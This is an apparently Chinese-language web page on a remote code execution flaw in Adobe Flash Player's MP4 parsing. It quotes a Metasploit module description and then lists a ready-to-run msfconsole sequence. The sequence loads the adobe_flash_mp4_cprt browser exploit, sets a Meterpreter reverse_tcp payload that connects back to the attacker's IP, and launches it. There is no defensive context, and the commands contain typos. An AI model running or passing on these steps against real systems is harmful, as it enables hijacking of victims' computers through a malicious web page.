Adobe Flash Player 新安全漏洞
【Not vulnerable】
Adobe Flash Player 11.1.115.6
Adobe Flash Player 11.1.111.6
Adobe Flash Player 11.1.102.6
【README - Metasploit Modules】
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user.
【modules】
abobe_flash_mp4_cprt
【command】
msfupdate && msfconsole
serach adobe_mp4
use exploit/windows/browser/adobe_flash_mp4_cprt
show options
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
set URIPATH /
exploit
【supportate】